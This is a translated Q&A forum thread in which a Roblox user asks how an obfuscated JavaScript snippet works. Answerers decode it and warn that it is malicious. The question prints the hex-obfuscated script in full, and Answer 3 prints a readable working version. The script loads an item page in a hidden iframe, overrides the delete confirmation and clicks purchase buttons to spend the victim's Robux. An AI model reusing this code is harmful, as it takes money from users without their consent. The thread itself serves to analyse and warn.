javascript - 有人能告诉我这段代码是如何工作的吗？

Question

我是游戏Roblox的用户，有人给了我这个来运行。我知道这很糟糕，因为我禁用了通过购买 T 恤来拿走某人钱的部分，这是代码底部的行，内容为/*iframe[_0xebe7[20]] = whe;*/.

这个变量是如何_0x2d54工作的？我以前从未见过这种类型的编码，它让我感到困惑，因为我想理解它。

我不确定十六进制编码是如何工作的，但我遇到了一个类似的帖子：解码这个奇怪的 Javascript

var _0x2d54=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x66\x6F\x72\x2D\x74\x72\x61\x64\x65\x73\x2D\x69\x74\x65\x6D\x3F\x69\x64\x3D\x36\x37\x39\x32\x38\x39\x31\x38","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x75\x72\x63\x68\x61\x73\x65\x57\x69\x74\x68\x52\x6F\x62\x75\x78\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x72\x6F\x63\x65\x65\x64\x57\x69\x74\x68\x50\x75\x72\x63\x68\x61\x73\x65\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x62\x74\x6E\x44\x65\x6C\x65\x74\x65","\x77\x69\x64\x74\x68","\x31","\x68\x65\x69\x67\x68\x74","\x7A\x2D\x69\x6E\x64\x65\x78","\x73\x74\x79\x6C\x65","\x2D\x31","\x63\x6F\x6E\x74\x65\x6E\x74\x44\x6F\x63\x75\x6D\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x20\x6C\x6F\x61\x64\x65\x64","\x6C\x6F\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6E\x66\x69\x72\x6D\x44\x65\x6C\x65\x74\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x63\x6C\x69\x63\x6B","\x73\x72\x63","\x6F\x6E\x6C\x6F\x61\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
var _0xebe7=[_0x2d54[0],_0x2d54[1],_0x2d54[2],_0x2d54[3],_0x2d54[4],_0x2d54[5],_0x2d54[6],_0x2d54[7],_0x2d54[8],_0x2d54[9],_0x2d54[10],_0x2d54[11],_0x2d54[12],_0x2d54[13],_0x2d54[14],_0x2d54[15],_0x2d54[16],_0x2d54[17],_0x2d54[18],_0x2d54[19],_0x2d54[20],_0x2d54[21],_0x2d54[22]];
var shirt=_0xebe7[0];
var iframe=document[_0xebe7[2]](_0xebe7[1]);
var b1=_0xebe7[3];
var b2=_0xebe7[4];
var b3 =_0xebe7[5];
iframe[_0xebe7[6]] = _0xebe7[7];
iframe[_0xebe7[8]] = _0xebe7[7];
iframe[_0xebe7[10]][_0xebe7[9]] = _0xebe7[11];

function whe(){
    var _0x9b91x8 = iframe[_0xebe7[12]]; 
    console[_0xebe7[14]](_0xebe7[13]);
    if (_0x9b91x8[_0xebe7[15]](b3)){
        iframe[_0xebe7[17]][_0xebe7[16]] = (function (){
            return function (){
                return true;
            } 
        ;} 
        )();
        iframe[_0xebe7[12]][_0xebe7[15]](b3)[_0xebe7[18]]();
    } else {
        if(_0x9b91x8[_0xebe7[15]](b2)){
            iframe[_0xebe7[12]][_0xebe7[15]](b2)[_0xebe7[18]]();
        } else {
            if(_0x9b91x8[_0xebe7[15]](b1)){
                iframe[_0xebe7[12]][_0xebe7[15]](b1)[_0xebe7[18]]();
            } 
        } 
    } 
} 
iframe[_0xebe7[19] ]= shirt;
/*iframe[_0xebe7[20]] = whe;*/
document[_0xebe7[22]][_0xebe7[21]](iframe);

Answer 1

你必须努力理解这段代码。开发人员故意让人难以理解。

他们混淆了代码以减慢复制它的其他人的速度。

您可以首先更改变量并运行代码以查看发生了什么变化。这将为您提供有关该特定变量的作用的提示。但是有很多变数。

编辑： 实际上，我收回了这一点。尝试在不运行代码的情况下尽可能多地理解代码。正如 Mathew 在下面指出的那样，它可能是恶意软件。然后，一旦你有了更好的想法，就小心翼翼地戳它。

Answer 2

它包含多个值的数组。

[
    "http://www.roblox.com/for-trades-item?id=67928918", 
    "iframe", 
    "createElement", 
    "ctl00_cphRoblox_PurchaseWithRobuxButton", 
    "ctl00_cphRoblox_ProceedWithPurchaseButton", 
    "ctl00_cphRoblox_btnDelete", 
    "width", 
    "1", 
    "height", 
    "z-index", 
    "style", 
    "-1", 
    "contentDocument", 
    "iframe loaded", 
    "log", 
    "getElementById", 
    "confirmDelete", 
    "contentWindow", 
    "click", 
    "src", 
    "onload", 
    "appendChild", 
    "body"
]

在我看来这是一个讨厌的脚本，你不应该运行它。

Answer 3

基本上，它iframe向当前页面添加了一个不可见的http://www.roblox.com/for-trades-item?id=67928918作为源。然后它尝试：

1. 在没有确认的情况下单击“删除”按钮
2. 点击“购买”按钮
3. 点击“Robux”按钮

许多浏览器会保护您免受此类代码生成的点击事件的影响，但您仍然不应该运行它。

去混淆：

var iframe = document.createElement("iframe");
iframe.width = 1;
iframe.heigth = 1;
iframe.style.zIndex = -1;
iframe.src = "http://www.roblox.com/for-trades-item?id=67928918";

function whe() {
  var cDoc = iframe.contentDocument;
  console.log("iframe loaded");

  if (cDoc.getElementById("ctl00_cphRoblox_btnDelete")) {
    iframe.contentWindow.confirmDelete = (function () {
      return function () {
        return true;
      };
    })();

    iframe.contentDocument.getElementById("ctl00_cphRoblox_btnDelete").click();

  } else {
    if (cDoc.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton")) {
      iframe.contentDocument.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton").click();
    } else {
      if (cDoc.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton")) {
        iframe.contentDocument.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton").click();
      }
    }
  }
}

iframe.onload = whe;

document.body.appendChild(iframe);

Answer 4

我的评论可能会被删除，因为它是答案而不是评论。

它被混淆了，您可以通过 console.log(_0xebe7) 查看变量的所有值。要获取值并稍微提高可读性，您可以使用http://jsbeautifier.org